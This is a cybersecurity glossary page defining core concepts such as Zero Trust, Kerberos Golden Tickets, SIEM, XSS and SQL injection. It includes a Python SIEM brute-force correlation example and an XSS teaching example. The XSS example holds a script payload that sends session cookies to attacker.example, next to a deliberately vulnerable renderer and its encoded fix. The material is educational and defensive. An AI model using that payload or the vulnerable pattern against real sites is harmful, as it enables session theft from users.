THE CODEX
The cognitive armory. Mastering concepts to master the battlefield.
Zero Trust
Never trust, always verify
A security model that assumes threats are present both inside and outside the network. No user or device is trusted by default, regardless of network location: every access request is authenticated and authorized on its own merits, and being "on the corporate LAN" grants nothing.
Cyber Kill Chain
The anatomy of an attack
Model developed by Lockheed Martin describing the 7 stages of a cyberattack: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control (C2), Actions on Objectives.
MITRE ATT&CK
The encyclopedia of tactics
A public knowledge base of adversary tactics, techniques and procedures (TTPs) built from real-world observations. Used to classify and describe attacker behaviour, map detection coverage and plan adversary emulation.
Red vs Blue Teaming
The art of simulated war
The Red Team plays the adversary (OPFOR) to test defenses. The Blue Team detects and defends the infrastructure. Purple teaming is the collaborative mode in which the two work side by side, sharing techniques and findings so that each Red Team action turns into a concrete detection or hardening improvement.
CIA Triad
The three pillars of security
Confidentiality (only authorized parties can read the data), Integrity (data is not altered without detection), Availability (systems and data are reachable when needed). The foundation of any security policy.
Defense in Depth
The castle strategy
Layering multiple security measures (firewall, IDS, encryption, training) so that a failure in one does not compromise the entire system.
OSINT
Open Source Intelligence
The collection and analysis of publicly available information (social media, DNS, whois) to gather intelligence on a target. The primary weapon of reconnaissance.
Honeypot
The hacker trap
A decoy system designed to look attractive or vulnerable so that attackers interact with it, revealing intrusion attempts and their techniques. It has no legitimate users, so any traffic to it is suspicious by definition. It must be isolated from production: a compromised honeypot that can reach real systems becomes the attacker's foothold rather than a trap.
Ransomware
Digital hostage taking
Malware that encrypts the victim's data and demands a ransom (usually in cryptocurrency) to restore access. Modern crews also exfiltrate the data before encrypting it and threaten to publish it if the ransom is not paid (Double Extortion), so backups alone no longer neutralize the threat.
Zero-Day
The dangerous unknown
A software vulnerability unknown to the vendor, so no patch exists when it is first exploited: defenders have had "zero days" to react. Working exploits for such bugs are highly prized and command high prices from brokers and on the black market.
Air Gap
Physical isolation
A security measure consisting of physically isolating a secure network from any other network, including the Internet. Used for critical systems (nuclear, military, industrial control). The gap is only as strong as its enforcement: removable media and maintenance laptops are the classic ways malware crosses it.
Social Engineering
Human hacking
The art of manipulating people into divulging confidential information or performing actions that compromise security. Often more effective than technical attacks.
Golden Ticket
Key to the kingdom
In an Active Directory environment, a Kerberos Ticket Granting Ticket (TGT) forged with the key (password hash) of the domain's krbtgt account. Because domain controllers trust anything encrypted with that key, the attacker can mint tickets for any user, including Domain Admins, and the access survives ordinary password resets: only changing the krbtgt password twice invalidates it.
SIEM
The control tower
Security Information and Event Management. A platform that collects logs from across the estate, normalizes them and correlates them in near real time against rules and baselines to surface anomalies and incidents for analysts.
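The correlation step is what turns raw logs into an incident. The following is an added example, not code from the page or from any SIEM product: a sliding-window rule that flags a source address which produces a burst of failed logins and then a success. The log lines are constructed for the example and the ssh log format, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample auth log (not from any real system), sshd-style lines.
SAMPLE_LOGS = """\
2024-05-01T10:00:01Z sshd[1201]: Failed password for alice from 203.0.113.7 port 50211
2024-05-01T10:00:03Z sshd[1201]: Failed password for alice from 203.0.113.7 port 50212
2024-05-01T10:00:05Z sshd[1201]: Failed password for bob from 203.0.113.7 port 50213
2024-05-01T10:00:08Z sshd[1201]: Failed password for alice from 203.0.113.7 port 50214
2024-05-01T10:00:09Z sshd[1201]: Failed password for root from 203.0.113.7 port 50215
2024-05-01T10:00:12Z sshd[1201]: Accepted password for alice from 203.0.113.7 port 50216
2024-05-01T10:00:30Z sshd[1201]: Failed password for carol from 198.51.100.2 port 41000
2024-05-01T10:05:00Z sshd[1201]: Accepted password for carol from 198.51.100.2 port 41001
"""

# Normalisation: one regex per log source turns free text into fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<outcome>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+$"
)


def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # unparsed lines are dropped here; a real SIEM would count them
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "outcome": m["outcome"],
        "user": m["user"],
        "src": m["src"],
    }


def correlate(lines, threshold=5, window=timedelta(seconds=60)):
    """Rule (assumed values): at least `threshold` failures from one source
    within `window`, followed by a success from that source, is reported as
    a probable brute-force compromise."""
    failures = defaultdict(deque)  # src -> timestamps of recent failures
    alerts = []
    for raw in lines.splitlines():
        ev = parse(raw)
        if ev is None:
            continue
        q = failures[ev["src"]]
        # Drop failures that have fallen out of the sliding window
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if ev["outcome"] == "Failed":
            q.append(ev["ts"])
        elif len(q) >= threshold:  # success right after a burst of failures
            alerts.append({
                "src": ev["src"],
                "user": ev["user"],
                "failures_before_success": len(q),
                "ts": ev["ts"].isoformat(),
            })
            q.clear()
    return alerts


if __name__ == "__main__":
    for a in correlate(SAMPLE_LOGS):
        print("ALERT brute-force then success:", a)
```

On the constructed input the rule fires once, for 203.0.113.7 logging in as alice after five failures; carol's single failure four and a half minutes earlier has aged out of the window, so her successful login is not flagged.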
DLP
Leak prevention
Data Loss Prevention. Policies and tools that identify sensitive data (classification, pattern matching) and block or flag it when it is about to leave the organization without authorization, whether by email, web upload, removable media or cloud sync.
XSS
Cross-Site Scripting
A web vulnerability in which untrusted input is placed into an HTML page without proper output encoding, so attacker-supplied script (usually JavaScript) runs in other users' browsers with the site's privileges: session theft, actions performed as the victim, page defacement.
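The defect and its fix side by side, as an added example that is not code from the page: a server-side renderer that interpolates a comment into HTML, the same renderer with output encoding for the text context, and the attribute-context case where encoding alone is not enough. The comment payload and the helper names are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker payload: a stored comment that exfiltrates the session cookie.
PAYLOAD = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'


def render_comment_vulnerable(author, body):
    """Untrusted input dropped straight into the markup: the browser parses
    the <script> tag and runs it in every reader's session."""
    return f"<p><b>{author}</b>: {body}</p>"


def render_comment_safe(author, body):
    """Encode for the HTML text context. html.escape(quote=True) rewrites
    & < > \" ' so the browser shows the payload as text instead of parsing it."""
    return (f"<p><b>{html.escape(author, quote=True)}</b>: "
            f"{html.escape(body, quote=True)}</p>")


def safe_href(url):
    """Attribute context needs more than encoding: 'javascript:alert(1)' contains
    nothing html.escape would touch, yet it executes when the link is clicked.
    Allow only http(s) URLs (an assumed policy) and neutralise everything else."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link(label, url):
    return f'<a href="{safe_href(url)}">{html.escape(label, quote=True)}</a>'


def contains_script(rendered):
    """Crude check used only to make the difference visible: did a live
    <script> tag survive rendering?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(render_link("profile", "javascript:alert(document.domain)"))
```

The rule a practitioner takes away: encode for the context the data lands in (HTML text, attribute, URL, JavaScript string), and for URLs validate the scheme in addition to encoding. A Content-Security-Policy header is a worthwhile second layer but does not replace encoding.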
SQL Injection
Database injection
An attack in which untrusted input is concatenated into a SQL query instead of being passed as a bound parameter, letting the attacker rewrite the query's logic: bypass authentication, read or modify other tables, or delete data. The flaw lives in the application's query construction, not in the database engine.
Lateral Movement
Internal expansion
Techniques used by attackers to move progressively through a network after compromising an initial machine, searching for high-value targets.
Least Privilege
Principle of least privilege
The principle that a user, service or process should hold only the rights strictly necessary to perform its task, for only as long as needed, and no more. It limits the blast radius when an account or component is compromised.
Supply Chain Attack
Attacking through the suppliers
Compromising a less protected element of an organization's supply chain (a vendor, a third-party library, a build pipeline, a software update channel) in order to reach the final target through a relationship it already trusts.